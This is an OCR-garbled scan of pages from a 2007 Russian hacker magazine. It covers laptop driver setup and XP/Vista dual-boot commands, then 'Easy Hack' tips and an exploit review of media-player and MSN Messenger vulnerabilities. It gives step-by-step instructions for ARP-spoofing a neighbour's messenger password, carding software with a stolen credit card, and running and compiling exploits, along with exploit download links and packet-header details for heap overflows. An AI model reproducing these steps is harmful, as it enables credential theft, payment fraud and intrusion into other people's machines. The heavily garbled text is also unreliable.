аналогичное сетевое соединение. Нужно признать, что 
ОгіѵегБсап является полезной фишкой, но пока несколько 
глуповатой — парочка важных устройств до сих пор была 
неопознанной. 

В ЗАВЕРШАЕМ УСТАНОВКУ 

По моим скромным подсчетам, мне оставалось установить 
дрова на видео и звук. Именно эти два устройства до сих пор 
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Устанавливаем свежий пакетдровишекотіпіеі 




Выводим девайсы на чистую воду 



не отображались в системе. Причем если отсутствие видео я еще мог как-то 
пережить (как ни странно, ноутбук подстроился под удобное мне разреше- 
ние экрана), то без звука — как без воздуха. 

Я продолжил насиловать ОгіѵегѲиісіе. По запросу на поиск видеодрайве- 
ра под чипсет Іпіеі 6МА 950 появилось несколько ссылок, но ни одна из 
них не привела меня к нужному драйверу. При запуске установщика тот 
умирал с прощальной надписью, гласящей, что в системе не обнаружено 
подходящего устройства. Одна из ссылок все-таки сработала и позво- 
лила установить поддержку видео, но адаптер оставался анонимным :(. 
Пришлось через Гугл искать ссылку на видео под вышеуказанный чипсет. 
Поворошив несколько ссылочек, я нашел, что хотел: полный пакет драй- 
веров под ОМА 950, который весил порядка 20 Мб. Слив все это на хард и 
установив в систему, я обрел счастье, посколькутеперь все видеоустрой- 
ства обнаружились без проблем. 

Оставался последний шаг — звуковая карта. По одному ключевому слову 
Реаііек искать было нереально — результатов была бы масса, а толку 
— ноль. Но немного погуглив, я обнаружил, что звуковушки в ноутахѴаіо 
совместимы стехнологией НідЬ ОеЛпібоп Аисііо. Этот факт мне тут же и 



пригодился — вбив это добавочное ключевое слово в поиск, я нашел нужный 
драйвер. Точнее, несколько драйверов, но угадал нужный со второго раза :). 

г ШЛИФУЕМ НАПИЛЬНИКОМ 

Вот, собственно, и все. И волки сыты, и овцы целы, и пастуху вечная память :). 
Несмотря на то что мы переплатили за ѴізГа, у нас при себе всегда есть 
ноутбуке рабочей лошадкой ѴѴіпХР, которая хоть и глючит (без этого никак), 
но не лагает, каксумасшедшая. 

Вот что ятебе посоветую сделать в дальнейшем: во-первых, обязательно 
сохрани все драйверы, которыеты нашел для ѴѴіпХР (не дай бог потеряешь), 
а еще лучше — залей их на болванку. Во-вторых, используя Еѵегезі.ты те- 
перь можешь сточностью определить все системные устройства и, посетив 
официальный сайт производителя, выкачать последние релизы драйверов 
(тогда система все-таки постабильнее будет работать). И, наконец, добавь 
в закладки сайт ѵѵѵѵѵѵ.сігіѵегаиісіе.сот . Несмотря на то что у него имеются 
конкуренты, все они идутлесом при сравнении с его большой коллекцией 
драйверов и прочих интересных фишек, которые существенно облегчат 
тебе жизнь, цц 



Две системы 
на одном винте 

Хочу тебе рассказать одну поучительную историю, не относящуюся 
к поиску драйверов. Несмотря на нелюбовь к Висте, мне захотелось 
иметь ее в качестве второй системы. Ведь я заплатил за нее ! Не отка- 
зываться же от собственных денег! Тем более что, если вдруг ѴѴіпХР 
случайно упадет, я смогу хоть как-то существовать в Висте. 

Скажу тебе сразу, что Виста немного по-другому вписывает себя в 
бутсектор харда, нежели ѴѴіпХР. Последняя грузится при помощи би- 
нарника ХпгИг, исполняемого файла пГбеГесН.сот и текстового конфига 
ЪооН.іпі. Ѵійаже запускается с помощью скрытого системного файла 
ВооНт^г и туевой хучи других файлов, расположенных в папке \Воо1і. 
Поэтому поздравь себя — как только ты поставил ѴѴіпХР, то перезаписал 
МВК и больше не увидишь ѴізТа как своих ушей. 

Чтобы решить эту проблему, тебе нужен загрузочный диск с Вистой. 
Втыкай его в СБ-КОМ, загружайся и выбирай вариант «Восстановление 
системы» сразу после указания основного языка. Здесь ты можешь либо 
довериться автоматическому мастеру (первый пункт), либо выбрать 
пунктик «Командная строка» и ввести ключевую фразу «ХЪооЛВооКесИ. 



ехе — ]МТ60 АН». Результатом обоих действий будет перезапись МВК, но 
уже Вистой. Теперь ты распрощаешься с ѴѴіпХР, однако это уже обратимо. 
Грузим Висту, как обычно, ждем 5 минут (а ты как хотел?), запускаем от 
администратора стб.ехе (при обычных правах Ѵізііа не даст тебе ничего 
записать в бутсектор) и далее последовательно вбиваем ряд команд: 

ѵ7Іпсіоѵ7з\5узі:ет32\ВссІесііЬ — сгеаРе {пСІсіг} -сі 
"МІСГОЗОбС МІ1КІОѴ75 ХР" 

ѵ7Іпсіоѵ7з\зузі:ет32\ВссІесііЬ — зеР {пСІсіг} сіеѵісе 
рагРіРіоп=С : 

ѵ?іпс1оѵ7з\зузбет32\ВссІес1і1: — зеР {пріеіг} раЫа ХпРІсІг 
тпйоѵ?з\зузі:ет32\Вс(}есІіі: — сіізріауогсіег {пріеіг} 
-асісііазі: 

Все ! Теперь Ѵізііа навеки полюбила ѴѴіпХР. Отмечу, что раздел нужно 
указывать именно С:, несмотря на то что ѴѴіпХР установлена на О: . 

Здесь имеется ввиду активная партиция, где расположен менеджер 
загрузки. 

Еще один способ для случки двух операционок кроется в использовании 
программы ЕазуВСО (Ьпр://пео5тагТпе1:/б1.рЬр?іс1=1) . Как ее юзать, 
разберешься сам, скажу лишь, что вышеописанное действие через 
утилиту осуществляется тремя кликами. 
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МАЗТЕВ-1.АМЕ-МАЗТЕВ 

Еазу Наск} 




ХАКЕРСКИЕ СЕКРЕТЫ 
ПРОСТЫХВЕЩЕЙ 



Наверняка, у тебя нередко возникают проблемы, которые ты не можешь решить само- 
стоятельно. Ведь на форумах помощи не дождешься, а вечно занятые друзья-гуру не 
уделяют тебе должного внимания. С сегодняшнего дня мы прекращаем это безобразие 
Теперь из номера в номер ты сможешь наслаждаться нашей новой рубрикой Базу Наск, 
где мы обрисуем наиболее типичные проблемы и покажем все возможные способы их 
решения. Тебе останется лишь взять ручку и аккуратно это все законспектировать. 





Перехват ІРС- переписки. По аналогии 
ловятся сообщения I СО 



СНИФАЕМ ПАРОЛЬ В ЛОКАЛКЕ 



ЗАДАЧА: ОТСНИФАТЬ ПАРОЛЬ НА КРУТОЙ ШЕСТИЗНАК СВОЕГО 
СОСЕДА В СЕГМЕНТЕ ЛОКАЛКИ. 

РЕШЕНИЕ: 

1 .Скачать программу ІСОВпііі от ІЛаЗоЙ ѵ.3.0.39 [ ѵѵѵѵѵѵ.БоскзсЬаіп.сотЛіІез/ 
иіазоіТ ісдзпіі 3.0.39.ехе ]. умеющую улавливать и придавать удобочита- 
емый вид авторизационным пакетам ІСО, ІРС, 5МТР, РОРЗ ит.п., а также 
перехватывать сообщения ІСО и ІРС. Используя технологию АВР Зрообпд, 
тулза умеет перехватывать трафик нетолько с хабов, но и со свитчей. 

2. Установить ее на компьютер и запустить. 

3. Зайти в «Инструменты Выбрать адаптер» и выбрать свою сетевую кар- 
точку из большого списка (обычно это что-то вроде Веаііек РТЬ81 69). 

4. Поставить галочку ЕпаЫе АРР Зрообпд для перехвата трафика с комму- 
таторов и нажать кнопку Зсап Сап. Если все сделано правильно, слева на 
экране появится списокживых машин из твоего сегмента. 

5. Отметить галочкой ІР-адрес машины твоего друга, которого собираешься 
разорить на один шестизнак, и нажать <Р5>. 

6. Попить чаю/кофе/пива до тех пор, пока на вкладке І_од (справа) не появят- 
ся ключевые слова о перехвате заветного пароля :). 

7. Существует и альтернативный многофункциональный снифер с поддерж- 
кой АРР Зрообпд — Саіп&АЬеІотохісІ.іІ ( \ллл/ѵѵ.охіб.іі/саіп.Ьігп[ ). 




ІАПУСКАЕМ СПЛОИТ ПОД ВИНДОЙ| 



ЗАДАЧА: ОБОЙТИ СЛЕДУЮЩУЮ ОШИБКУ, КОТОРУЮ ВЫДАЕТ 
НОВЫЙ ЭКСПЛОЙТ ДЛЯ РНРВВ ПОД ВИНДОЙ: 



ьеагсй.срап.огд — официальный ресурс модулей для Регі 




Сап'С ІосаСе ШР/ІІзегАдепі: .рт іп @ШС (@ШС согЩаіпз: Б:/ 
Рег1/1іЬ Б: /Рег1/зіСе/1іЬ .) аБ ехрІоіБ.рІ Ііпе 3 . 

ВЕСШ баі1е(і--сошрі1а1:іоп аЬогѣесІ аБ ехрІоіБ.рІ Ііпе 3. 

РЕШЕНИЕ: 

1. В системе отсутствует нужный эксплойту модуль — С\Л/Р::1)зегАдепС 
Эта библиотека существенно упрощает работу с НТТР-протоколом и 
используется во многих эксплойтах. 

В поисках ее зайди на зеагсЬ.срап.ога — центральное хранилище всех 
модулей для Регі. 

2. Отыщи там указанный модуль, просто введя «І_\Л/Р::1)зегАдеп1:» в форму 
поиска. 

3. Скачай архив себе на комп и распакуй библиотеку ІІзегАдепІ.рт в 
сДрегІ\5ІІе\ІіЬ\І_ѴѴР\ (при условии, что Регіутебя установлен в сДрегІ). 

4. Наслаждайся стабильной работой. 
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Альтернативное решение: 

Бываеттак, что сплоиттребует какую-то другую библиотеку, скажем, 
Музці.рт для работы с СУБД Му5СН_. Ее так просто не поставить, по- 
скольку продвинутая либа требует установки кучи других библиотек. Для 
решения этой задачи (впрочем, таким же способом можно установить и 
І_ѴѴР) прибегнем к встроенной программе ррт, помогающей без проблем 
устанавливать любые компоненты: 

1 . Зайди в меню «Пуск», выбери «Выполнить» и набери команду ррт. 

2. После инициализации всех модулей ррт тебя поприветствует при- 
глашение (похожее на приглашение 005). Недолго думая пиши туда: 
«зеагсб тузрі». 



№3 



ІКАРДИНГ СОФТУ 



ЗАДАЧА: КУПИТЬ ШАРАВАРНУЮ ПРОГРАММУ 

ЗА 30 БАКСОВ, ИСПОЛЬЗУЯ ЧУЖУЮ КРЕДИТНУЮ КАРТОЧКУ. 

РЕШЕНИЕ (ОТ КАРДЕРА-ГУРУ С ЗАКРЫТОГО ФОРУМА): 

Несмотря на то что многие сайты, где продается та или иная програм- 
ма, подключены к автоматическому биллингу типа сбескоиі, 
жесткой проверки личности пользователя карты, а уж тем более 
оповещения владельца карты или запроса документов не производит- 
ся. Все дело в том, что сумма рядового софта (если это, конечно, 
не анализатор космической активности :)) колеблется от 1 0 до 
1 00 долларов. Для реализации задумки кардер делает 
следующее: 



3. Перед тобой возникнет внушительный список. Найди там нужный 
модуль. Пусть это будет ОВО-МузцІ. 

4. Вбивай іпзіаіі Б В 0 : : Музр I и жди успешного завершения операции. 

В случае необходимости скачивания дополнительных модулей ррт 
сделает это за тебя. 

Р.5.: В Ыпихустановка модулей Регі куда более простая. Там можно про- 
сто распаковать архив и набрать три команды: таке, таке іпвіаіі, таке 
Іезі — умный установщик все сделаетза тебя, еще и протестирует работу 
библиотеки. Также можно запустить аналог виндового ррт следующей 
командой: регІ-МСРАЫ-е збеіі. 



1 . По купает/приватизирует/ где -то находит (нужное подчеркнуть) актив- 
ную кредитную карту с положительным балансом (из реквизитов нужно 
знать номер карты, ее владельца, срок истечения и СѴѴ2-код). 

2. Прикрывается проксиком, желательно той страны, откуда родом вла- 
делец карты (халявные прокси можно найти на сайте ѵѵеЬ-Ьаск.ги ). 

3. Регистрируетлевый етаіі-адрес, например, на ѵаЬоо.сот . имеющий 
следующий вид: фамилия_владельца_карты.его_имяйуабоо.сот. 

4. Заходит на сайт, вбивает данные кредитки и етаіі и через некоторое 
время получает регистрационный код программы. 

5. В ряде случаев компания можетзапросить контактный телефон или 
копии документов. Если это произшло, значит кардер где-то прокололся 
(или фирма таким образом проверяет всех своих клиентов). Конечно, 
даже здесь есть свои выходы, но о них публично я рассказывать не буду. 

Р.5.: Эта задача и ее решение приводятся здесь л ишь для того, чтобы напом- 
нить тебе, как делать нельзя, поскольку кардингу нас пока еще вне закона и по- 
тому наказуем. Ноеслитебе все-таки взбредет в голову им заняться, помни: ни 
автор, ни редакция за твои действия никакой ответственности не несут. 



№4 



РЕШ-ПРИ ЛОЖЕН ИЯ БЕЗ ПЕРЛ, 



ЗАДАЧА I: ЗАПУСТИТЬ ПЕРЛОВЫЙ ЭКСПЛОЙТ ДЛЯ ЛОКАЛЬНОГО 

ВЗЛОМА НА МАШИНКЕ, ГДЕ НЕТ РЕВЬ 

РЕШЕНИЕ: 

1. Установить себе на машину рег12ехе ( ѵѵѵѵѵѵ.іпбіаозіаг.сот/рег^ехе.біт ). 
способную скомпилировать текстовый эксплойт в бинарный код, который 
потом можно запустить на машине без установленного компилятора. 

2. Распаковать архив с рег12ехе в папку с простым названием (желатель- 
но с:\рег12ехе). Если путь будет сложным, рег12ехе откажется запускаться. 

3. Переместить сплоит в папку с рег12ехе. 

4. Набрать из каталога с:\рег12ехе консольную команду: рег12ехе ехріоіі. 
рІ-о=ехрІоі1.ехе. 

5. Наслаждаться работающим бинарником, нос ограничениями три- 
альной версии рег12ехе: бинарникпо весу будет достигать 

3-4 Мб, потому как рег12ехе пихает в него базовую поддержку компи- 
лятора и все библиотеки, используемые приложением. Если восполь- 
зоваться платной версией рег12ехе, можно сгенерировать бинарники с 
оптимизацией по размерулибо ОІЛ-версию. Цена Рго-версии — $49, а 
о том, как покупать шараварные утилиты, мы рассказали тебе выше :). 

6. Если твой эксплойт использует какие-то экзотические модули, возможно, 
тебе понадобится поправить их вручную. У меня как-то была ситуация, когда 
рег12ехе не мог переварить пару строк из модуля обработчика хіз-файлов. 
Пришлось их просто закомментировать. 




Р.З.: Существует Рег12ехе и под Іі п их, однако зовется он уже регісс и по 
умолчанию входит в состав Регі. 

ЗАДАЧА II: КАК СДЕЛАТЬ ТО ЖЕ САМОЕ, НОВ СЛУЧАЕ С РНР? 

РЕШЕНИЕ: 

1. Скачать утилиту рЬр2ехе ( Ьипаег.ги/геІеазез/рбрЗехе ). принцип работы 
которой схож с рег12ехе и уже описывался в нашем журнале. 

2. Скопировать в папку с рЬр2ехе одну из двух библиотек, в зависимости 
от версии РНР (4 или 5). 

3. Запустить рЬр2ехе и передать ей в качестве параметра эксплойт. 

4. Получить на выходе рабочий ехе-эксплойт. Его следует запускать из 
папки с вышеуказанной библиотекой. нс 
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Обзор 

эксплойтов 




Сегодняшний обзор эксплойтов будет посвящен дефектам реализации видеоплееров. 
Живое общение через ѴѴеЪсат, просмотр потокового сетевого видео, открытие АѴІ-фай- 
лов, полученных из ненадежных источников, — все это категорически небезопасно и 
чревато полным захватом управления над компьютером-жертвой. Не ожидал? Вот и я не 
ожидал, пока мой компьютер едва не поломали! 



Месііа Ріауег Сіаззіс: удаленное переполне- 
ние буфера 




ВгіеГ 

Долгое время народ смотрел видео в штатном плеере, входящем в состав 
ѴѴіпбоѵѵз 98 и благополучно перекочевавшем оттуда в ѴѴіпбоѵѵз 2000, но 
уже в ХР появилось какое-то уродище, отъедающее кучу ресурсов, ужасно 
тормозное, неповоротливое и неудобное в работе, забывшее половину 
прежних горячих клавиш и активно налегающее на мышь. Короче, про- 
двинутая часть молодежи забила на это чудо дизайна и бросилась искать 
альтернативные плееры. 

Лично я остановился на ВЗРІауег’е, с которого чуть позже перешел 
на М Ріауег, а тем временем появился независимый проект Месііа 
Ріауег СІа55Іс(МРС). Внешне напоминающий старый ѴѴі п б оѵуб- пле- 
ер, только бесплатный, распространяемый в исходных текстах и с 
кучей новых реально полезных функций, он успел образовать вокруг 
себя целое сообщество поклонников. Последнюю версию можно ска- 
чать с Кузни: ЫірѴ/зоигсеІогае.пеі/ргоіесІз/аиІіѵегкІі . однако делать 
это категорически не рекомендуется, потому что 1 2 сентября 2007 
года исследовательская лаборатория Собе Аибіі І_аЬз обнаружила в 
нем множество дыр, связанных с дефектной обработкой заголовков 
АѴІ-файлов. 




Еще один заголовок АѴІ-файла, вызывающий переполнение МРС 



Оказалось, что в плеере напрочь отсутствует проверка следующих полей: іпбх 
Ігискзііе.ѵѵЕопдзРегЕпІгуи пЕпІгіезІпизе, некорректные значения которых 
вызывают целый каскад разрушительных последствий (переполнение кучи, 
целочисленное переполнение ит.д.), ведущих к возможности удаленного захва- 
та управленияуязвимым компьютером с МРС-привилегиями илиже (в случае 
неудачной атаки) каварийному завершению работы самого плеера. Только 
попробуй открыть АѴІ-файл, полученный из ненадежный источников, и... ага! 

Тагдеіз 

В настоящее время уязвимость подтверждена в диііѵегкіі Мебіа Ріауег 
Сіаззіс 6. 4. 9. 0, об остальных версиях пока ничего не известно, но есть все 
основания полагать, что указанная уязвимость распространяется и на них. 

Ехріоіі 

На рисунках приведены примеры заголовков АѴІ-файлов, вызывающих 
переполнение, но не содержащих никакого збеіі-кода, воткнуть который 
— забота хакера. Естественно, АѴІ-заголовок — это еще не АѴІ-файл, и, 
чтобы дописать необходимые части (или пропатчить Ьіеѵѵ’ом заголовокуже 
существующего видеоклипа), нам потребуется спецификация на АѴІ-фор- 
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мат, которую можно бесплатно скачать с ѵѵѵѵѵѵ.аіехапсіег-пое.сот/ѵісіео/ 
сіоситепіабоп/аѵі.рсіі или с \ллллл/.Ібе-[аЬ5.сот/Ѵібео/ЪбтШ : 2-аѵібеЕрб1 : . 

Зоіиііоп 

Разработчики все еще никак не отреагировали на сообщение о 
дыре, и на момент написания этого обзора официальные заплат- 



ки отсутствуют. Поэтому остается лишь порекомендовать либо 
отказаться от использования МРС.либо не проигрывать АѴІ- 
файлы, полученные из ненадежных источников (кстати говоря, 
расширение файла не играет никакой роли, и файл, записанный 
в формате АѴІ, вполне может иметь расширение тред или любое 
другое]. 




МРІауег: переполнение кучи 

ВгіеГ 

МРІауег— замечательный кросс-платформенный проигрыватель видео/аудио, 
поддерживающий рекордное количество форматов и великолепно справляющий- 
ся с битыми файлами, которые остальные плееры проигрывать отказываются (к 
томуже в его состав входит тепсобег— единственный известный мне кодиров- 
щик, следящий за синхробитами и не допускающий рассогласования аудио- и 
видеопотоков). Зто бесплатный проект, распространяющийся в исходныхтекстах: 
ѵѵѵѵѵѵ.трІаѵегЬд.Ьи . но, увы, не лишенный дефектов проектирования, последний 
из которых был обнаружен 1 2 сентября 2007 года исследовательской лабораторией 
Собе АисІИ; І_аЬз, обратившей внимание на отсутствие проверки одного из полей 
за головка АѴІ-файла.АименноіпсІхІгискзііе, некорректныезначения которого 
приводяткпереполнению кучи с возможностьюудаленного захвата управления 
(впрочем, тут все зависитотопций компиляции, атакже версии библиотеки діібс]. 
Дыра прячется в файле ІіЬтрбетих/аѵіЬеабег.с (дефектные строки выделе- 
ны полужирным шрифтом). 

За более подробной информацией по этой теме обращайся науууууу. 
5есигіМоси5.сот/агсЫѵе/1/479222 и ѵѵѵѵѵу.зесигбѵ^осиз.сот/ 
Ыб/25648. 




МРІауегза работой 



Тагдеіз 

Уязвимость подтверждена в МРІауег 1 .0 -гсі , входящем в состав множе- 
ства дистрибутивов (в частности, в МапсігакеЗоН: І_іпих Мапбгаке 2007.1 
х86_64), а также в МРІауег’е, скомпилированном под ѴѴіпбоѵѵз 2000 5Р4 
с использованием библиотеки дІіЬссверсиеймены±іей,чем2.5.Про 
остальные версии на данный момент ничего не известно, но вполне 
вероятно, что они также уязвимы. 

Ехріоіі 

Ниже приведен пример заголовка АѴІ-файлов, вызывающего переполне- 
ние, но не содержащего никакого 5ИеІІ-кода. 

Боіиііоп 

Разработчики все еще никак не отреагировали на сообщение о дыре, и 
на момент написания этой статьи официальные заплатки отсутствуют, 
поэтому остается лишь порекомендовать либо отказаться от использования 
МРІауег'а, либо не проигрывать АѴІ-файлы, полученные из ненадежных 
источников. 



Страничка хакерской группы бІМУСІТІ^ЕІЧ, открывшей множество дыр в 
ОиіскТіте 






ЭЪМТЧІЫ И ь*#а 




АррІейиіскТіте: удаленное исполнение 
команд в браузерах 

ВгіеГ 

8ІМІІСГП2ЕМ — весьма креативная хакерская группа, активно и про- 
дуктивно исследующая ОиіскТіте и обнаружившая в нем множество 
ошибок, часть из которых была признана разработчиками, а часть 
злостно проигнорирована, поскольку, по их мнению, они (ошибки, 
а не разработчики), не представляют серьезной проблемы. Парни 
из 6ЫІІСІТІ2ЕМ слегка обиделись и решили доказать, что это нетак. 
Результатом их работы стал боевой эксплойт, выложенный в откры- 
тый доступ 1 2 сентября 2007 года на ѵуѵѵѵѵ.аписШгеп.ога/Ыоа/Осіаѵ- 
диіскІіте-рѵѵпз-Лгеіюх и запускающий стандартный «Калькулятор». 
За ним последователи намного более коварные эксплойты, напри- 
мер, уводящие систему в шатдаун при нажатии на ссылку, ведущую 
к трЗ-файлу. Фактически атакующий получает полный контроль 
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Назначение байт в заголовке пакета ѴѴМѴЗ-кодека 



кодопілй помер ГГЩЙТЛ 
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Типы пакетов, поддерживаемые МІ_20-кодеком 



над уязвимой системой и может выполнять на ней любые команды, 
которым достаточно текущего уровня привилегий, имеющихся у 
браузера (Горящего Лиса или ІЕ). Естественно, ОиіскТіте должен быть 
установлен. 

Фокус в том, что ОиіскТіте при открытии файла сохраняет его на диске (с 
учетом расширения, которое может и не соответствовать действительнос- 
ти), после чего пытается проиграть, определяя формат не по расширению, а 
по содержимому! Таким образом мы можем засунуть хті-страничку в файл 
с любым из расширений, поддерживаемых ОиіскТіте (а их, поверь, очень 
много). 

Горящий Лисзахаваетхтісо всеми командами, содержащимися в нем, по- 
зволяя создавать системно-независимые эксплойты, работающие на лю- 
бой платформе. С ІЕ ситуация несколько сложнее, однако он также уязвим 
(в трЗ-файл можно засунуть любой ехе или І~ТтІ-страничку, выполняемую 
с локальными привилегиями, то есть имеющую доступ ко всем дисковым 
файлам и сетевым ресурсам). 

ТагдеІБ 

В настоящее время уязвимость подтверждена в ІЕ7, ГігеРох 2. 0.0. 6 и 3.0. 
Опера выглядит неуязвимой. 



МісгозоН М5Ы Меззепдег: переполнение 
буфера 

ВгіеГ 

28 августа этого года китайский хакер по кличке ѵѵизбі (входящий в состав 
группы Теат509) обнаружил несколько дыр в МІ_20/ѴѴМѴЗ-кодеках, 
используемых втаких программных продуктах, как, например, МісговоЛ 
М5Ы Меззепдег и МісговоЛ ѴѴіпсІоѵѵз І_іѵе Меззепдег, опубликовав 
детальную информацию на своей странице ѵѵѵѵѵѵТеа т509.сот/тос! и Іез. 
рЬр?пате=Ме\л/5&ііІе=агЛс1.е&5ІсІ=50 . написанной на смеси китайского и 
английского языков. 



Ехріоііз 

Исходный текст оригинального эксплойта, запускающего «Калькулятор» 
(со всеми комментариями его создателя), можно найти по ссылке 
ѵѵѵѵѵѵ.аписШгеп.ога/ЬІоа/ОсІаѵ-аиіскІіте-рѵѵпз-Тгеіох. 

А вот ссылки на несколько безобидных эксплойтов, предназначенных для 
проверки твоей системы на вшивость: 

ѵѵѵѵѵѵ.аписШгеп.ога/ргоіесІз/ОсІаѵ-диіскІіте-рѵѵпз-Лгеіох/ВЕУОГѵІСЕ.трЗ . 

ѵѵѵѵѵѵ.аписіІігеп.ога/ргоіесІз/ОсІаѵ-аиіскІіте-рѵѵпз-ГгеФх/ргОпО.тоѵ . 

ѵѵѵѵѵѵ.аписШгеп.ога/ргоіесіз/ОсІаѵ-аиіскііппе-рѵѵпз-Лгеіох/РиппѵРоа. 

треа . 

ѵлллл/ѵ.аписібгеп.ога/ргоіесІз/ОсІаѵ-диіскііте-рѵупз-ГгеЬх/бЬозІІпТЬеБЬеи.аѵі . 
Следующий эксплойт ( ѵѵѵѵѵѵ.аписіІігеп.ога/ргоіесІз/ОсІаѵ-диіскІіте-рѵѵпз- 
Лгеіох/5НЦТР0ѴУІЧ РОЫТ СЫСК.трЗ ) в случае удачной атаки отправляет 
систему в шатдаун.такчто, прежде чем кликать по ссылке, сохрани все 
несохраненные данные, которые было бы жалко потерять. 

Боіиііопз 

Не устанавливать ОиіскТіте (удалить, если был установлен ранее) или же 
использовать Оперу и/или другие безопасные браузеры, например І_упх 
или І_іпкз, которые ктомуже и бесплатны. 



ѴѴеЬ-камера, управляемая Меззепдег'ом, может работать как на ТСР-, так 
и на I) О Р- прото коле. Обычно (то есть поумолчанию) выбирается ІІРР как 
наиболее быстродействующий. Меззепдег используеттри типа ІШР- 
пакетов: 1 ) зуп-пакеты (сокращение отзупсбгопііабоп — «отвечающие 
за синхронизацию»), 2) аск-пакеты (сокращение отаскпоѵѵіесідетепі: 

— «подтверждение») и 3) сіаіа -іга пзГег пакеты, передающие аудио-/ви- 
деоданные. 

Первые два типа пакетов нам совершенно неинтересны, а воткбаіа- 
Ігапз^ег пакетам мы присмотримся повнимательнее. Анализ дампов, 
награбленных снифером, позволяет реконструировать их структуру. 
Заголовок сіа^а-ігапзіег пакета, обрабатываемого МІ_20- коде ком, состоит 



► 048 



ХАКЕР 10 /106/ 07 




из 9 байт, за которыми следует полезная видеонагрузка (рауіоасі). Пример 
одного из таких заголовков приведен ниже: 

[ГОР ЬеасЗег] 9Б 49 Е1 8Е 4А 09 ВЕ 09 0А [ѵісіео-рауіоасі] 

Хакеры успешно расшифровали назначение каждого байта заголовка. 




Описание назначений находится в следующей таблице. 

Первые 2 байта интерпретируются как короткое целое (збогі: іпіедег), 
равное вданном случае49906, причем 1 1 младших бит хранят актуальную 
длину ѵібео-рауіоасі, которую можно вычислить, наложив на 1 6-битное 
значение число 7РР6 через операцию логического «И». РІапример, длина 
ѵісіео-рауіоасі равна: 499 й 6 & 7РР6 = 1906. 

Оставшиеся 5 старших битопределяюттип пакета, вычисляемый по 
следующей формуле: раскеМуре == 49906 >> 11 & 7. Сами типы пакетов 
перечислены ниже: 

В рассматриваемом нами примере индекс фрейма в видеопотоке равен 
ВЕР, индекс чанка — 096, а общее количество чанков во фрейме — 0А6. 
Используя эту информацию, кодек собирает полный видеофрейм из ІЮР- 
пакетов, полученных из сети, последовательность отправки которых, как 
известно, не всегда совпадаете последовательностью их приема. 

Однако процедура сборки пакетов реализована с ошибкой и проверяет 
только количество чанков во фрейме (пит_с6ипк5І, не обращая внимания 
на их индексы (сбипк_іпс!ех). Экспериментально выяснено, что, если 
индекс чанка равен или превышает83б, происходит переполнение ди- 
намической памяти (кучи) с возможностью засылки збеіі-кода и захвата 
управления компьютером-жертвой с привилегиями М5Ы Меззепдег’а. 
Следует помнить, что разработчики ХР серьезно потрудились над защитой 
кучи от переполнения. В Висте защита претерпела значительные изме- 
нения и была существенно усилена, поэтому традиционные эксплойты 
согласятся работать лишь с ѴѴіпсІоѵѵз 2000 и более ранними системами. 
Впрочем, как мы писали в одном из выпусков обзора эксплойтов, обе за- 
щиты уже давно поломаны, и потому удаленный захватуправления вполне 
реален даже на машинах с аппаратной поддержкой ОЕР, запрещающей 
исполнение кода в куче. Но это уже тема совсем другого разговора, никак 
не относящегося к этой конкретной дыре, в которую и слон пролезет. 
ѴѴМѴЗ-кодек ведет себя аналогичным образом, но имеет несколько 
другую структуру заголовка пакета, длина которого на 1 байт больше, чем 
в МІ_20. Возросло и количество типов пакетов. К известным нам пакетам 
аск/зуп/сІаІа-ІгапБІег добавились аисііо-пакеты и пакеты аутентификации 
(аиіб-пакеты). Структура заголовка еще окончательно не расшифрована 
(и является предметом горячих дискуссий китайских хакеров), однако кое- 
какие шаги в этом направлении уже сделаны: 

Рассмотрим следующий пример: 
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Назначение байтов в заголовке пакета МІ_20-кодека 



[ББР Ьеайег] 62 81 69 00 94 В4 СБ 08 0А 04 [рауіоасі] 

Назначение расшифрованных байтѴѴМѴЗ-заголовка приводится ниже: 
Тип пакета определяется по формуле на рисунке выше, где X — значение 
первого байта заголовка. 

Длина полезной нагрузки вычисляется путем деления содержимого 
второго байта на 20, что равносильно битовому сдвигу на 5 позиций влево. 
В данном случае мы имеем: 69816 >> 5 = 3406. По непроверенным данным, 
ѴѴМѴЗ-па кет может содержать сразу как аудио-, так и видеоданные, что 
слегка усложняет реализацию атакующей программы. 

Процедура сборки пакетов содержит ту же самую ошибку, что и МІ_20-ко- 
дек, приводящую к возможности удаленного переполнения кучи со всеми 
вытекающими отсюда последствиями. 

Более подробную информацию потеме можно найти на уже упомянутой 
странице Теат509, ну а куслугамтех, кто не умеет читать по-китайски, 
бюллетень безопасности от М5: ѵѵѵѵѵѵ.гпісгозоІІсогпЛесбпеі/зесигіІѵ/ 
Ви11ебп/М507-054.тзрх . Технической информации здесь нет, зато есть 
куча «воды». Можно заглянуть и на ѵѵѵѵѵѵ.5есигіЫоси5.сот/ЬісІ/25461 . 
только ничего полезного там также нет. 

Тагдеіз 

Уязвимы следующие системы: М5Ы Меззепдегб.2, 7.0, 7.5, атакже 
ѴѴіпсІоѵѵз І_іѵе Меззепдег версии 8.0. На М5Ы Меззепдег7. 0.0820 и ѴѴіпсІоѵѵз 
І_іѵе Меззепдег8.1 угроза атаки уже не распространяется, и ошибки сборки 
пакетов в них исправлены (хотя, как известно, Місгозоб: практически 
никогда не фиксит подобные дыры с первой попытки). 



Ехріоіі 

И сходный текст эксплойта, написанного китайскими хакерами на 
Місгозоб: Ѵізиаі С++ 7 и протестированного ими же под ѴѴіпсІоѵѵз 2000 5Р4, 
лежит в гаг-архиве по следующему адресу: ѵѵѵѵѵѵ.зесигіМосиз.согп/сІаІа/ 
ѵиіпегабііібез/ехріоііз/ехр тзп.гаг 

Как откомпилировать его другими компиляторами более ранних 
версий? Очень просто! Находим в архиве файл ехр_тзп.срр, удаля- 
ем все остальные (это не шутка, они действительно нам не нужны). 
Открываем ехр_тзп.срр в текстовом редакторе, удаляем все вклю- 
чаемые файлы, обозначенные директивой «#іпсІисІе хххх», после 
чего прописываем «#іпсІисІе <ѵѵіпсІоѵѵ5.б>» и компилируем файл с 
ключом /Бй, предписывающим линкеру создавать не исполняемый 
файл, а динамическую библиотеку, которой по сути этот эксплойт и 
является. 

$с1.ехе ехр_шзп.срр /Ох /ББ 

Воттолько збеіі-код, содержащийся внутри ехр_тзп.срр, ориентирован 
исключительно на ѴѴіпсІоѵѵз 2000. Защиту отпереполнения кучи вХР 5Р2 
(не говоря уже о Висте!) он, естественно, пробить не в состоянии. Впрочем, 
«правильный» збеіі-код нетрудно взять из любого другого эксплойта. 

Боіиііоп 

Обновить М5І\І Меззепдег до версии 7.0.0820, а ѴѴіпсІоѵѵз І_іѵе Меззепдег 
до версии 8.1 через ѴѴіпсІоѵѵз ІІрсІаІе или отказаться от их 
использования. □□ 



► обо 
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историческая НТ5 Рогде,- создателей ХПД рты 

